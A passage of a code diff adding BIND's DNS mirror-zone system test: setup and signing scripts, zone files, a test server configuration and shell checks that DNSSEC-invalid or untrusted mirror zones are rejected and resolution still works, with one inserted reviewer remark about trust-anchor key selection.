+ keyname2=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null)
+
+ cat $infile $keyname1.key $keyname2.key > $zonefile
+
+ # Prepare a properly signed version of the zone ("*.original.signed").
+ $SIGNER -P -o $zone $zonefile > /dev/null
+ cp $zonefile.signed $zonefile.original.signed
+ # Prepare a version of the zone with a bogus SOA RRSIG ("*.bad.signed").
+ sed "s/${ORIGINAL_SERIAL}/${UPDATED_SERIAL_BAD}/;" $zonefile.signed > $zonefile.bad.signed
+ # Prepare another properly signed version of the zone ("*.good.signed").
+ sed "s/${ORIGINAL_SERIAL}/${UPDATED_SERIAL_GOOD}/;" $zonefile > $zonefile.good
+ $SIGNER -P -o $zone $zonefile.good > /dev/null
+ rm -f $zonefile.good
+
+ # Except for the "verify-untrusted" zone, declare the KSK used for
+ # signing the zone to be a trust anchor for ns3.
+ if [ "$variant" != "untrusted" ]; then
+ keys_to_trust="$keys_to_trust $keyname1"
+ fi
+done
+
+keyfile_to_static_ds $keys_to_trust > trusted-mirror.conf
diff --git a/bin/tests/system/mirror/ns2/sub.example.db.in b/bin/tests/system/mirror/ns2/sub.example.db.in
new file mode 100644
index 0000000..d2c15c7
--- /dev/null
+++ b/bin/tests/system/mirror/ns2/sub.example.db.in
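Review bot: The assignment `keys_to_trust="$keys_to_trust $keyname1"` placed after the first `done` relies on `$keyname1` still holding the value from the loop's final iteration, so the trust anchor written to trusted-mirror.conf is the intended one only while `initially-unavailable` stays last in `for zonename in sub.example example initially-unavailable`. Reordering or extending that list would silently make ns3 trust another zone's KSK; for `example` that would sidestep the chain of trust from the root zone which the comment says is being exercised, and the affected checks might still pass. Picking the key inside the loop removes the dependency on iteration order, in the same form the second loop already uses for `untrusted`: `if [ "$zonename" = "initially-unavailable" ]; then keys_to_trust="$keys_to_trust $keyname1"; fi`. The explanatory comment would then move into the loop next to that test.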
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns2.example. hostmaster 1 3600 1200 604800 3600
+@ NS ns2.example.
+foo A 127.0.0.1
diff --git a/bin/tests/system/mirror/ns2/verify.db.in b/bin/tests/system/mirror/ns2/verify.db.in
new file mode 100644
index 0000000..b3ed22a
--- /dev/null
+++ b/bin/tests/system/mirror/ns2/verify.db.in
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns2 hostmaster 2000010100 3600 1200 604800 3600
+@ NS ns2
+ns2 A 10.53.0.2
diff --git a/bin/tests/system/mirror/ns3/named.args b/bin/tests/system/mirror/ns3/named.args
new file mode 100644
index 0000000..7519c8f
--- /dev/null
+++ b/bin/tests/system/mirror/ns3/named.args
@@ -0,0 +1 @@
+-D mirror-ns3 -X named.lock -m record,size,mctx -c named.conf -d 99 -g -U 4 -T maxcachesize=2097152 -T tat=3
diff --git a/bin/tests/system/mirror/ns3/named.conf.in b/bin/tests/system/mirror/ns3/named.conf.in
new file mode 100644
index 0000000..58d8bd5
--- /dev/null
+++ b/bin/tests/system/mirror/ns3/named.conf.in
@@ -0,0 +1,101 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + allow-query-cache { 10.53.0.1; }; + trust-anchor-telemetry yes; + allow-new-zones yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "." { + type mirror; + primaries { 10.53.0.1; }; + file "root.db.mirror"; +}; + +zone "initially-unavailable" { + type mirror; + primaries { 10.53.0.2; }; + file "initially-unavailable.db.mirror"; + use-alt-transfer-source no; +}; + +zone "verify-axfr" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-axfr.db.mirror"; +}; + +zone "verify-csk" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-csk.db.mirror"; +}; + +zone "verify-ixfr" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-ixfr.db.mirror"; + masterfile-format text; +}; + +zone "verify-load" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-load.db.mirror"; + masterfile-format text; +}; + +zone "verify-reconfig" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-reconfig.db.mirror"; + masterfile-format text; +}; + +zone "verify-unsigned" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-unsigned.db.mirror"; +}; + +zone "verify-untrusted" { + type mirror; + primaries { 
10.53.0.2; }; + file "verify-untrusted.db.mirror"; +}; + +include "../ns1/trusted.conf"; +include "../ns2/trusted-mirror.conf"; diff --git a/bin/tests/system/mirror/setup.sh b/bin/tests/system/mirror/setup.sh new file mode 100644 index 0000000..b91c06d --- /dev/null +++ b/bin/tests/system/mirror/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +( cd ns1 && $SHELL -e sign.sh ) + +cat ns2/verify-axfr.db.bad.signed > ns2/verify-axfr.db.signed +cat ns2/verify-load.db.bad.signed > ns3/verify-load.db.mirror diff --git a/bin/tests/system/mirror/tests.sh b/bin/tests/system/mirror/tests.sh new file mode 100644 index 0000000..c93c58d --- /dev/null +++ b/bin/tests/system/mirror/tests.sh 
@@ -0,0 +1,557 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT} -b 10.53.0.1 +dnssec +time=2 +tries=1 +multi" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# Wait until the transfer of the given zone to ns3 either completes +# successfully or is aborted by a verification failure or a REFUSED response +# from the primary. Note that matching on any transfer status is deliberately +# avoided because some checks performed by this test cause transfer attempts to +# end with the "IXFR failed" status, which is followed by an AXFR retry and +# this test needs to check what the result of the latter transfer attempt is. +wait_for_transfer() { + zone=$1 + for i in 1 2 3 4 5 6 7 8 9 10; do + # Wait until a "freeing transfer context" message is logged + # after one of the transfer results we are looking for is + # logged. This is needed to prevent races when checking for + # "mirror zone is now in use" messages. + nextpartpeek ns3/named.run | \ + awk "matched; /'$zone\/IN'.*Transfer status: (success|verify failure|REFUSED)/ {matched=1}" | \ + grep "'$zone/IN'.*freeing transfer context" > /dev/null && return + sleep 1 + done + echo_i "exceeded time limit waiting for proof of '$zone' being transferred to appear in ns3/named.run" + ret=1 +} + +# Wait until loading the given zone on the given server either completes +# successfully for the specified serial number or fails. 
+wait_for_load() { + zone=$1 + serial=$2 + log=$3 + for i in 1 2 3 4 5 6 7 8 9 10; do + # Wait until a "zone_postload: (...): done" message is logged + # after one of the loading-related messages we are looking for + # is logged. This is needed to prevent races when checking for + # "mirror zone is now in use" messages. + nextpartpeek $log | \ + awk "matched; /$zone.*(loaded serial $serial|unable to load)/ {matched=1}" | \ + grep "zone_postload: zone $zone/IN: done" > /dev/null && return + sleep 1 + done + echo_i "exceeded time limit waiting for proof of '$zone' being loaded to appear in $log" + ret=1 +} + +# Trigger a reload of ns2 and wait until loading the given zone completes. +reload_zone() { + zone=$1 + serial=$2 + rndc_reload ns2 10.53.0.2 + wait_for_load $zone $serial ns2/named.run +} + +status=0 +n=0 + +ORIGINAL_SERIAL=$(awk '$2 == "SOA" {print $5}' ns2/verify.db.in) +UPDATED_SERIAL_BAD=$((ORIGINAL_SERIAL + 1)) +UPDATED_SERIAL_GOOD=$((ORIGINAL_SERIAL + 2)) + +n=$((n + 1)) +echo_i "checking that an unsigned mirror zone is rejected ($n)" +ret=0 +wait_for_transfer verify-unsigned +$DIG $DIGOPTS @10.53.0.3 +norec verify-unsigned SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${ORIGINAL_SERIAL}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "verify-unsigned.*Zone contains no DNSSEC keys" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-unsigned.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone signed using an untrusted key is rejected ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_transfer verify-untrusted +$DIG $DIGOPTS @10.53.0.3 +norec verify-untrusted SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${ORIGINAL_SERIAL}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 
+nextpartpeek ns3/named.run | grep "verify-untrusted.*No trusted DNSKEY found" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-untrusted.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone signed using a CSK without the SEP bit set is accepted ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_transfer verify-csk +$DIG $DIGOPTS @10.53.0.3 +norec verify-csk SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${ORIGINAL_SERIAL}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-csk.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an AXFR of an incorrectly signed mirror zone is rejected ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_transfer verify-axfr +$DIG $DIGOPTS @10.53.0.3 +norec verify-axfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-axfr SOA" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-axfr.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an AXFR of an updated, correctly signed mirror zone is accepted ($n)" +ret=0 +nextpart ns3/named.run > /dev/null +cat ns2/verify-axfr.db.good.signed > ns2/verify-axfr.db.signed +reload_zone verify-axfr ${UPDATED_SERIAL_GOOD} +$RNDCCMD 10.53.0.3 retransfer verify-axfr > /dev/null 2>&1 +wait_for_transfer verify-axfr +$DIG $DIGOPTS @10.53.0.3 +norec verify-axfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > 
/dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-axfr.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an IXFR of an incorrectly signed mirror zone is rejected ($n)" +nextpartreset ns3/named.run +ret=0 +wait_for_transfer verify-ixfr +# Sanity check: the initial, properly signed version of the zone should have +# been announced as coming into effect. +nextpart ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null || ret=1 +# Make a copy of the original zone file for reuse in journal tests below. +cp ns2/verify-ixfr.db.signed ns3/verify-journal.db.mirror +# Wait 1 second so that the zone file timestamp changes and the subsequent +# invocation of "rndc reload" triggers a zone reload. +sleep 1 +cat ns2/verify-ixfr.db.bad.signed > ns2/verify-ixfr.db.signed +reload_zone verify-ixfr ${UPDATED_SERIAL_BAD} +# Make a copy of the bad zone journal for reuse in journal tests below. +cp ns2/verify-ixfr.db.signed.jnl ns3/verify-journal.db.bad.mirror.jnl +# Trigger IXFR. +$RNDCCMD 10.53.0.3 refresh verify-ixfr > /dev/null 2>&1 +wait_for_transfer verify-ixfr +# Ensure the transfer was incremental as expected. +if [ $(nextpartpeek ns3/named.run | grep "verify-ixfr.*got incremental response" | wc -l) -eq 0 ]; then + echo_i "failed: did not get an incremental response" + ret=1 +fi +# Ensure the new, bad version of the zone was not accepted. +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +# A positive answer is expected as the original version of the "verify-ixfr" +# zone should have been successfully verified. 
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-ixfr SOA" > /dev/null || ret=1 +# Despite the verification failure for this IXFR, this mirror zone should still +# be in use as its previous version should have been verified successfully. +nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is no longer in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an IXFR of an updated, correctly signed mirror zone is accepted after AXFR failover ($n)" +ret=0 +nextpart ns3/named.run > /dev/null +# Wait 1 second so that the zone file timestamp changes and the subsequent +# invocation of "rndc reload" triggers a zone reload. +sleep 1 +cat ns2/verify-ixfr.db.good.signed > ns2/verify-ixfr.db.signed +reload_zone verify-ixfr ${UPDATED_SERIAL_GOOD} +# Make a copy of the good zone journal for reuse in journal tests below. +cp ns2/verify-ixfr.db.signed.jnl ns3/verify-journal.db.good.mirror.jnl +# Trigger IXFR. +$RNDCCMD 10.53.0.3 refresh verify-ixfr > /dev/null 2>&1 +wait_for_transfer verify-ixfr +# Ensure the new, good version of the zone was accepted. +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +# The log message announcing the mirror zone coming into effect should not have +# been logged this time since the mirror zone in question is expected to +# already be in use before this test case is checked. 
+nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading an incorrectly signed mirror zone from disk fails ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_load verify-load ${UPDATED_SERIAL_BAD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-load SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-load SOA" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-load.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "ensuring trust anchor telemetry queries are sent upstream for a mirror zone ($n)" +ret=0 +# ns3 is started with "-T tat=3", so TAT queries should have already been sent. 
+grep "_ta-[-0-9a-f]*/NULL" ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading a correctly signed mirror zone from disk succeeds ($n)" +ret=0 +stop_server --use-rndc --port ${CONTROLPORT} ns3 +cat ns2/verify-load.db.good.signed > ns3/verify-load.db.mirror +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +wait_for_load verify-load ${UPDATED_SERIAL_GOOD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-load SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-load.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading a journal for an incorrectly signed mirror zone fails ($n)" +ret=0 +stop_server --use-rndc --port ${CONTROLPORT} ns3 +cp ns3/verify-journal.db.mirror ns3/verify-ixfr.db.mirror +cp ns3/verify-journal.db.bad.mirror.jnl ns3/verify-ixfr.db.mirror.jnl +# Temporarily disable transfers of the "verify-ixfr" zone on ns2. This is +# required to reliably test whether the message announcing the mirror zone +# coming into effect is not logged after a failed journal verification since +# otherwise a corrected version of the zone may be transferred after +# verification fails but before we look for the aforementioned log message. +# (NOTE: Keep the embedded newline in the sed function list below.) 
+sed '/^zone "verify-ixfr" {$/,/^};$/ { + s/10.53.0.3/10.53.0.254/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +wait_for_load verify-ixfr ${UPDATED_SERIAL_BAD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-ixfr SOA" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null && ret=1 +# Restore transfers for the "verify-ixfr" zone on ns2. +# (NOTE: Keep the embedded newline in the sed function list below.) +sed '/^zone "verify-ixfr" {$/,/^};$/ { + s/10.53.0.254/10.53.0.3/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading a journal for a correctly signed mirror zone succeeds ($n)" +ret=0 +stop_server --use-rndc --port ${CONTROLPORT} ns3 +cp ns3/verify-journal.db.mirror ns3/verify-ixfr.db.mirror +cp ns3/verify-journal.db.good.mirror.jnl ns3/verify-ixfr.db.mirror.jnl +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +wait_for_load verify-ixfr ${UPDATED_SERIAL_GOOD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + 
+n=$((n + 1)) +echo_i "checking delegations sourced from a mirror zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 foo.example A +norec > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null && ret=1 +# Check that a delegation containing a DS RRset and glue is present. +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "example.*IN.*NS" dig.out.ns3.test$n > /dev/null || ret=1 +grep "example.*IN.*DS" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ns2.example.*A.*10.53.0.2" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that resolution involving a mirror zone works as expected ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 foo.example A > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +# Ensure ns1 was not queried. +grep "query 'foo.example/A/IN'" ns1/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that non-recursive queries for names below mirror zone get responded from cache ($n)" +ret=0 +# Issue a non-recursive query for an RRset which is expected to be in cache. +$DIG $DIGOPTS @10.53.0.3 +norec foo.example. A > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +# Ensure the response is not a delegation. 
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "foo.example.*IN.*A.*127.0.0.1" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that delegations from cache which improve mirror zone delegations are properly handled ($n)" +ret=0 +# First, issue a recursive query in order to cache an RRset which is not within +# the mirror zone's bailiwick. +$DIG $DIGOPTS @10.53.0.3 sub.example. NS > dig.out.ns3.test$n.1 2>&1 || ret=1 +# Ensure the child-side NS RRset is returned. +grep "NOERROR" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "ANSWER: 2" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "sub.example.*IN.*NS" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Issue a non-recursive query for something below the cached zone cut. +$DIG $DIGOPTS @10.53.0.3 +norec foo.sub.example. A > dig.out.ns3.test$n.2 2>&1 || ret=1 +# Ensure the cached NS RRset is returned in a delegation, along with the +# parent-side DS RRset. +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "sub.example.*IN.*NS" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "sub.example.*IN.*DS" dig.out.ns3.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking flags set in a DNSKEY response sourced from a mirror zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 . DNSKEY > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking flags set in a SOA response sourced from a mirror zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 . 
SOA > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* aa" dig.out.ns3.test$n > /dev/null && ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that resolution succeeds with unavailable mirror zone data ($n)" +ret=0 +wait_for_transfer initially-unavailable +# Query for a record in a zone that is set up to be mirrored, but +# untransferrable from the configured primary. Resolution should still succeed. +$DIG $DIGOPTS @10.53.0.3 foo.initially-unavailable. A > dig.out.ns3.test$n.1 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n.1 > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.1 > /dev/null || ret=1 +# Sanity check: the authoritative server should have been queried. +nextpart ns2/named.run | grep "query 'foo.initially-unavailable/A/IN'" > /dev/null || ret=1 +# Reconfigure ns2 so that the zone can be mirrored on ns3. +sed '/^zone "initially-unavailable" {$/,/^};$/ { + s/10.53.0.254/10.53.0.3/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +# Flush the cache on ns3 and retransfer the mirror zone. +$RNDCCMD 10.53.0.3 flush > /dev/null 2>&1 +nextpart ns3/named.run > /dev/null +$RNDCCMD 10.53.0.3 retransfer initially-unavailable > /dev/null 2>&1 +wait_for_transfer initially-unavailable +# Query for the same record again. Resolution should still succeed. +$DIG $DIGOPTS @10.53.0.3 foo.initially-unavailable. A > dig.out.ns3.test$n.2 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n.2 > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n.2 > /dev/null || ret=1 +# Ensure the authoritative server was not queried. 
+nextpart ns2/named.run | grep "query 'foo.initially-unavailable/A/IN'" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that resolution succeeds with expired mirror zone data ($n)" +ret=0 +# Reconfigure ns2 so that the zone from the previous test can no longer be +# mirrored on ns3. +sed '/^zone "initially-unavailable" {$/,/^};$/ { + s/10.53.0.3/10.53.0.254/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +# Stop ns3, update the timestamp of the zone file to one far in the past, then +# restart ns3. +stop_server --use-rndc --port ${CONTROLPORT} ns3 +touch -t 200001010000 ns3/initially-unavailable.db.mirror +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +# Ensure named attempts to retransfer the zone due to its expiry. +wait_for_transfer initially-unavailable +# Ensure the expected messages were logged. +nextpartpeek ns3/named.run | grep "initially-unavailable.*expired" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "initially-unavailable.*mirror zone is no longer in use" > /dev/null || ret=1 +# Query for a record in the expired zone. Resolution should still succeed. +$DIG $DIGOPTS @10.53.0.3 foo.initially-unavailable. A > dig.out.ns3.test$n 2>&1 || ret=1 +# Check response code and flags in the answer. +grep "NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.* ad" dig.out.ns3.test$n > /dev/null || ret=1 +# Sanity check: the authoritative server should have been queried. +nextpart ns2/named.run | grep "query 'foo.initially-unavailable/A/IN'" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that clients without cache access cannot retrieve mirror zone data ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 -b 10.53.0.3 +norec . 
